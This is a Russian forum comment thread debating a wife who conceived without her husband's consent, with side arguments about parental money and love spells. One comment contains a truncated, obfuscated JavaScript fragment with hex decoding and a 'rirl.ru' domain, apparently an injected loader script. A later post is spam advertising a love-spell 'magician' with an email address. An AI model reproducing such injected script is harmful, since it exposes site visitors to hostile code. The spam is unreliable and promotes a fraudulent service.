Вы вот были убеждены, что слишком взрослые, чтобы иметь ребенка, а муж Ваш убежден, что вы слишком взрослые, чтобы обеспечивать себя самостоятельно, не принимая помощи от родителей. Как бы Вы отреагировали, если бы он запретил Вам с ними общаться, не пускал бы на порог, набрал бы кредитов, например, чтобы оплатить свое обучение? Наверное бы, мягко говоря, не обрадовались бы, потому что решение принял он, не спрося Вас, а расхлебывать пришлось бы вместе. Так почему же Вы считаете, что Ваш поступок имеет место быть, и говорите об этом, как о чем-то обычным и нормальном?

И еще, мой Вам совет: не портите мужика — если он хочет сам, без помощи мам и пап — цените это, а не хайте, как что-то ужасное. Поражаюсь женщинам — сначала разбалуют мужчину, сделают нюней и подкаблучником, а потом жалуются, что вот-де, сам ничего не может, не то, что сосед, вот он-то мужик.

Ответить
Поддерживаю Да1 / Нет0
Не относитесь к жизни слишком серьезно. Живым вам из нее все равно не выбраться.
Scientific
6424 Scientific
Scientific offline
Репутация : 230813
Комментариев 3221 0
08 июня 13:44:30
2016-06-08 13:44:30

И что тут такого? Прерогатива женщины баловать, а мужчины - воспитывать. Автор жалуется, что её муж не является "мамкой-нянькой" из сказки, недостаточно сюсюкает и уже проявляет твёрдость, не спешит на каждый вскрик и т. п. Не смешите нас такими "проблемами". Кстати Вам явно стоит поинтересоваться методиками воспитания, потому как кажется - конфликты у Вас будут именно из-за взглядов на это, поэтому ОЧЕНЬ НЕЛИШНЕ в Вашем случае ВЫРАБОТАТЬ ЗАРАНЕЕ общие линии поведения (неважно, если Вы будете действовать по разному, но ОЧЕНЬ важно, чтобы сообща).
Насчёт помощи от родителей - это видимо вопрос гордости для мужа. Они для него всё равно будут долго чужими людьми, которые смогут в любой момент ткнуть ему и сказать "Ты теперь нам должен". Никогда не хвастайте при муже тем, "сколько они для нас сделали" - это прямой тык по его гордости. Однако использовать время родителей, я считаю, не должно возбраняться. А насчёт длительных и "планированых" детей я не согласен с Вашим мужем - в наше время перестали просто радоваться детям, начали их бояться, слишком сильно "планировать-перепланировать ", что стало уже проблемой. Естественно, чтобы не было проблем как у Вас время рождения ребёнка молодым желательно обговаривать ещё до свадьбы.

Ответить
Поддерживаю Да0 / Нет0
Natusik2007
12456 Natusik2007
Natusik2007 offline
Репутация : 78409
Комментариев 740 9
08 июня 13:49:20
2016-06-08 13:49:20

Согласна с , Читательница , что Вы, Яна, ведете себя эгоистично. Если вы семья, то все важные решения, в том числе и планирование ребенка, должны принимать совместно. И если Ваш супруг на данном этапе не готов стать отцом - это его право. Он молодой парень и у него другие приоритеты - учёба и карьера, что вполне нормально для его возраста. Вы переступили через его мнение и обманным путём забеременнели, - он простил Вам это и сейчас, жертвуя сном и учёбой, обеспечивает вашу семью и заботатся о вас. А какой влад в вашу семью принесли Вы, кроме того, что ухаживаете за малышом и клянчите деньги у родителей?
Насчет родителей, да, родители могут помогать своим детям, например, поняньчить внучку, отвести в детский сад или погулять в парке, но обеспечивать ваших детей должны именно вы, а не дедушки с бабушками.

Ответить
Поддерживаю Да2 / Нет0
Мне не нужно многого, я скромно довольствуюсь лучшим ))
Снайп
21160 Снайп
Снайп offline
Репутация : 68276
Комментариев 596 1
10 июня 22:52:11
2016-06-10 22:52:11

Согласен с почти всеми комментариями. Муж и устал и не готов и предательство.

От себя добавлю, что чудовищно неприятно, когда взбалмошная, избалованная, капризная девочка принимает такие серьёзные решения в одиночку. Тем более, когда ТОЧНО знает, что супруг пока против. Не просто лоялен:"Как Бог даст. ", а реально против. И он прав, 22 года-слишком юный возраст для отцовства, и, конечно, ему хочется и встать на ноги и погулять и пожить для себя. А вы ему просто навязали ребенка, как бы чудовищно это не звучало. Не люблю в людях черту ставить перед фактом-"Можно я уже вошла?". Это даже не тачку втихаря купить, тачку можно опять продать, а ребенок-это долгосрочный проект. И для мужа он пока (подчеркиваю-пока) не желанный. Поэтому ваше недоумение мне непонятно. Представьте, что вы живете в очень стесненных обстоятельствах, и вдруг муж берет кредит и покупает машину. Вы бы одобрили? А то, что он не хочет жить на иждивении у ваших родителей-очень по-мужски, он молодец. Жаль только, что жена ему досталась глупая и избалованная. Боюсь, что когда и он это поймет... придется вам растить ребенка с родителями.

Ответить
Поддерживаю Да2 / Нет0
Принимайте людей такими, как они есть.
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5953 9
13 июня 17:53:51
2016-06-13 17:53:51

Глупо осуждать автора, свой выбор она уже сделала и ребенка родила!Единственное-теперь вы замужем-и обеспечивать должен именно муж, а не родители!Родители могут конечно дарить подарки ребенку или вам, но именно помогать деньгами вам не обязаны, потому что теперь вы отдельная единица и у вас своя семья. Согласна со многими что вам взрослеть надо. ребенка поднимать а вы уже о 2-м думаете!!!!!Пипец просто, ваш муж еще и от рождения первого-то в себя не пришел, не надо с этим торопиться)А любовь свою мужчины проявляют тем что обеспечивают семью и заботятся о нас. это мы любим сюсюкаться и нежничать, а у парней все не так!Тем более у вашего мужа не было примера даже какие отношения должны быть в семье, так что вы должны быть мудрой и всему его научить сами!

Ответить
Поддерживаю Да1 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 122664
Комментариев 1113 17
14 июня 11:32:31
2016-06-14 11:32:31

Многие обвинили автора в этой истории. А я вот не понимаю, зачем тогда вообще выходить замуж, и зачем, извините , жениться , если ребенок воспринимается как нечто ненужное??? Что за бред? Женился , будь добр готовым быть к тому, что появится ребеночек и будет настоящая полноценная семья! Разве автор виновата в том, что хотела ребеночка от любимого мужчины???? В чем она неправа???? В чем? В том, что любая нормальная девушка хочет стать матерью, тем более замужняя?! Что, ждать годами и мечтать о малыше, ибо ее мужчине так удобно? Это вопрос к ее мужу: зачем женился, если не готов к детям? А она ни в чем ни перед кем не виновата!!!!!!!!!!!!! Замужняя женщина, имеет полное право не пить таблтетки и желать родить малыша! Годы идут, не стоят на месте и кто знает, сколько бы там ее муж занимался вопросами вставания на ноги. Через десяток -другой он бы ее обвинил в том, что она не смогла бы ему родить. Со стороны прям все такие не эгоисты.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

14 июня 11:53:14
2016-06-14 11:53:14
шоколадочка , То, что сделала эта глупая женщина, это предательство и неуважение мнение мужа. Она должна ему ноги целовать, что он не только простил ее, но и принял после всего этого. Если ей так плевать на его мнение, то не выходила бы замуж, рожала бы одна.
Ответить
Поддерживаю Да0 / Нет1
Гостья
Гостья

14 июня 11:53:24
2016-06-14 11:53:24
шоколадочка , Девушка 100% не права и виновата перед мужем. многие бы на его место вообще бы подали бы на развод и были бы правы в таком случаи. Женятся за тем, что бы быть вместе и урегулировать юридические отношения. Детей планируют, это не значит, что сразу как поженились надо рожать. Многие после свадьбы планируют детей, только через 5 лет и более. Это нормально. Не нормально когда жена, ни во что не ставит мнение мужа. Если бы она подождала, они бы вместе спланировали бы ребенка, это нормально и это семья. А когда жена единолично решает за мужа, вешает ему на шею хомут, это не семья, это поступок эгоистичной девочки, который рано было выходить замуж и тем более рожать. Да, замужняя женщина имеет полное право не пить таблетки и хотеть ребенка, но она не имеет право обманывать своего мужа, муж так же имеет право не хотеть в это время ребенка и предохраняться. В семье вопрос рождения детей решают двое, а не один из супругов. Если не готов совместно с супругом решать данный вопрос, то нечего жениться, можно сделать ЭКО или от первого встречного забеременеть, тогда право за рождения ребенка будет единолично на женщине. Но если женщина жена, она обязана учитывать мнение мужа о рождение ребенка, как и муж должен учитывать мнение жены. Семья на то и семья, что такие решения принимаются только совместно.
Ответить
Поддерживаю Да1 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
14 июня 14:36:44
2016-06-14 14:36:44

шоколадочка , не обижайся, но это у тебя (ничего, что на ты?) просто больная тема на счет детей, наверное, поэтому и комментарий твой таков, а если быть объективным, то все ни так, как ты пишешь. Что значит, что она имеет право не пить таблетки? Имеет, если поставит его в известность, и они изберут другой метод контрацепции. Воспитывать потом ребенка обоим, обоим содержать, поэтому она не имеет права принимать такое решение одна. А если приняла такое решение, то должна быть готова к последствиям своего решения, что он не захочет этого ребенка и даже разведется с ней. С мужчиной тоже нужно советоваться, ведь она будет в декрете, а кто должен быть обеспечивать семью, при этом также по ночам слушать крики ребенка? А женятся мужчины не всегда для того, чтоб заводить детей, женятся они, чтоб у них был абонемент на секс, готовку, уборку и т. д. , женятся они, чтоб жизнь их стала комфортнее, чтоб было куда возвращаться, и чтоб там кто-то ждал с вкусным ужином, а потом в кровати... Опять же стоит вспомнить о тех, кто вообще не хочет детей совсем, как же тут тогда? Скажешь, что они женятся тоже, чтоб детей завести?

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Снайп
21160 Снайп
Снайп offline
Репутация : 68276
Комментариев 596 1
14 июня 21:58:19
2016-06-14 21:58:19

Если честно, то даже если жена хомяка заведет без моего ведома-это уже неуважениее ко мне. Она, получается, плевать хотела на моё мнение.

Ответить
Поддерживаю Да1 / Нет0
Принимайте людей такими, как они есть.
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
15 июня 21:42:01
2016-06-15 21:42:01

Вот тут пишут мол жена должна спрашивать разрешения у мужа беременеть или нет, мол плюет на его мнение. А муж на ее мнение не плюет?То есть она должна получается думать только о том как ему хорошо, а он нет. У мужа может быть мнение. А жена безвольное создание что ли?

Лично я думаю. Не хочешь иметь детей. Значит как мужик не готов к семейной жизни. А стало быть не чего девушке голову морочить, мол милая будь моей любовницей только с росписью в ЗАГСе, но без детей?Не знаю как у вас. Лично для меня мужчина делающий предложение руки и сердца означает готовность к семейной жизни. А семейная жизнь подразумевает что в семье дети бывают. Нет я не говорю что у нас вне брака никто не беременеет. Но коли спишь с девушкой и детей не хочешь то предохраняйся сам!Не спихивай все на женщину!А если ты сам там расслабляешся и не заботишся то знай что и она может расслабится и забыть что нибудь принять!И все!Шанс через 9 мес увеличивается что ты станешь папой!

Просто наши мужчины очень привыкли что проблемы ети чаще всего решают женщины, а не они, Такие есть но их мало!

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Снайп
21160 Снайп
Снайп offline
Репутация : 68276
Комментариев 596 1
15 июня 23:36:53
2016-06-15 23:36:53

Неалина, вы не правы. Муж изначально не горел энтузиазмом, потом был категорично против и даже объяснил почему-он мужчина, хочет, для начала встать на ноги, а не висеть на шее родителей супруги. С таким же успехом могу спросить:для чего автор выходила замуж на таких условиях? Она ведь изначально все знала, просто "думала". Или-уж замуж невтерпёж? Если с самого начала не сходятся желания и интересы, отчего бы девушке не поискать другого мужа? Нет, "хочу, моё"! Так же и с ребенком. Плевать она на всё хотела-хочу! По поводу контрацепции-в каждой паре, я думаю, совместно решают к какому методу прибегнуть. Мужчина может предохраниться презерватимом и стерилизацией, но многие жены сами против таких мер.

В данной истории не у мужа есть мнение, а есть "хотелки" жены. Захотела-женила его на себе, захотела-родила, сейчас вот второго надумала, опять же не советуясь с мужем.

Ответить
Поддерживаю Да2 / Нет0
Принимайте людей такими, как они есть.
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
15 июня 23:50:14
2016-06-15 23:50:14

Снайп, согласна с вами на все 100%. О таких вещах договариваются на берегу. Муж четко и логично все объяснил -надо подождать, а не родителями прикрываться. если она еще 2го родит... это будет высший пилотаж идиотизма )))

Ответить
Поддерживаю Да1 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Снайп
21160 Снайп
Снайп offline
Репутация : 68276
Комментариев 596 1
16 июня 00:32:03
2016-06-16 00:32:03

Dead end, Вы прямо моя единомышленница, заметил, что часто мы соглашаемся друг с другм. А сейчас вы пишите "моими" словами. )

Ответить
Поддерживаю Да1 / Нет0
Принимайте людей такими, как они есть.
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
16 июня 01:37:58
2016-06-16 01:37:58

Снайп, ))) видно так звезды легли))

Ответить
Поддерживаю Да1 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Снайп
21160 Снайп
Снайп offline
Репутация : 68276
Комментариев 596 1
16 июня 01:41:37
2016-06-16 01:41:37

Dead end, Dead end, {#}

Ответить
Поддерживаю Да0 / Нет0
Принимайте людей такими, как они есть.
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 122664
Комментариев 1113 17
17 июня 16:47:36
2016-06-17 16:47:36

Снайп, " захотела- женила на себе" Ой, какой бедный муж. ))) КАК МОЖНО МУЖЧИНУ ЖЕНИТЬ НА СЕБЕ?????? Он, по-моему взрослый человек - чай не валенок, чтоб "женили " его без его на то ведома. Правильно Неалина говорит - захотел семью, будь добр быть готовым не только к беззаботному сексу.... Мужу ой как классно, а жена должна терять свои драгоценные годики, и ждать-ждать-ждать, когда же ее муж "сподвигнется" на малыша. Да, что вам, мужчинам, объяснять. Все равно не поймете (

Ответить
Поддерживаю Да1 / Нет0
Снайп
21160 Снайп
Снайп offline
Репутация : 68276
Комментариев 596 1
17 июня 23:26:59
2016-06-17 23:26:59

шоколадочка , Зря вы так думаете. Ну может я слишком резко написал про "женила на себе", но в остальном считаю себя правым. Трое моих знакомых ушли от вот таких "самостоятельных" жен. Спрашиваю:Ну что так сложно простить? Ведь у вас ребенок общий, он же не виноват, что жена дура!" Отвечают, как под копирку :"От ребенка не отказываюсь, но к жене-как отрезало. Вот в момент все чувства убило!"

Психология у мужчин такая. Двое всё-таки вернулись в семью, но один из них вытерпел только год. Встретил другую женщину, и в этой семье дети были запланированы и до сих пор вместе, кажется уже 6-ой год. Второй здорово погуливает и, кажется есть ребенок на стороне. А по поводу "женила на себе", ... ну вот есть у меня знакомая, Олечка, так она сама мне говорит, что женила на себе Лешку. "Этот валенок ещё бы лет 5 со мной женихался, надо было брать инициативу в свои руки!", 9 лет в браке, трое детей.

Ответить
Поддерживаю Да0 / Нет0
Принимайте людей такими, как они есть.
Михаил
Михаил

12 августа 21:29:19
2016-08-12 21:29:19
Я полгода ездил по деревнях в поисках ведьмы. Моя девушка на тот момент изменила мне с моим родным братом и ушла к нему жить. Думал-повешусь. Бабушки в деревнях оказались бессильны!!! Сто раз прошел выкачку яйцами и воском. Мне эта выкачка, как мертвому припарка. Мне приворот нужен был и срочно!!! Помощь нашел просто-по отзыву одного парня в инете с почти аналогичной проблемой. Он писал, что ему помог маг, вот так я приобрел помощь в лице совершенно незнакомых людей. Многие пишут, что по деревням искать нужно. Бред сивой кобылы. Только время потеряете и бензин спалите. Люди, связанные с темными силами, не афишируют свои способности. Иначе в селах их народец наш со свету сживет и дом сожжет. Такой у нас менталитет. Miwwa@bk. Ru
Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
13 августа 10:04:10
2016-08-13 10:04:10

Михаил, Приворот зло!И огромный грех такое делать!На хрена такая навязанная любовь нужна?Жить с человеком и знать, что на самом деле он или она тебя не любит!Лично мне такая любовь не нужна!А вам?

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
13 августа 13:29:32
2016-08-13 13:29:32

Михаил, и что было после приворота?

Нельзя заниматься таким! Это грех! Да и любви вы не получите! В результате человек то может и вернется, но именно любви не будет! Да и вы должны понимать, что от этих приворотов может и человек начать болеть, и вы сами, ибо вы вторгаетесь в энергетику человека, ну а еще должны понимать, чем потом заплатить придется, все в этой жзни имеет цену...

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 251676
Комментариев 2472 8
13 августа 13:40:01
2016-08-13 13:40:01

Читательница , Боже, я думала такой херней маются полоумные бабы, но что б мужик искал ведьму.....{#}И Яйцами выкатывал{#}.. Это же триндец, товарищи)))

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
13 августа 13:45:06
2016-08-13 13:45:06

Странная_Такая , не поверишь, но мне даже один мужик говорил про приворот! Я тоже в шоке была, ибо все же это женская прерогатива, а он мне сказал, что приворожит меня!{#}

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 251676
Комментариев 2472 8
13 августа 13:56:23
2016-08-13 13:56:23

Читательница , надеюсь, ты ноги в руки сразу схватила?

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
13 августа 14:27:03
2016-08-13 14:27:03

Странная_Такая , рассказала про грех, про испорченные души и сказала, чтоб не смел даже таким заниматься!

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
13 августа 21:40:18
2016-08-13 21:40:18

Читательница , Ето вообще трындец!Привораживать человека!Я блин таким никогда не занималась и не собираюсь!Лучше натуральных чувств ничего нет!Зачем такую цену платить за то чтоб человек был рядом?Как говорится насильно мил не будешь!А при таком счастья не появится!

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
13 августа 21:44:31
2016-08-13 21:44:31

Неалина, ну, это люди уже от безисходности! Да лучше бы вести себя научились, тогда и привораживать не пришлось, а то ведут себя как козлы, а потом удивляются, что девушки с ними быть не хотят!

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
13 августа 21:55:27
2016-08-13 21:55:27

Читательница , У меня тоже бывали безысходности. Но я ни разу не ринулась такое делать!По мне так такие вещи проявление егоизма человека!Потому как нельзя заставить любить!Лучше быть одному, чем так!

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке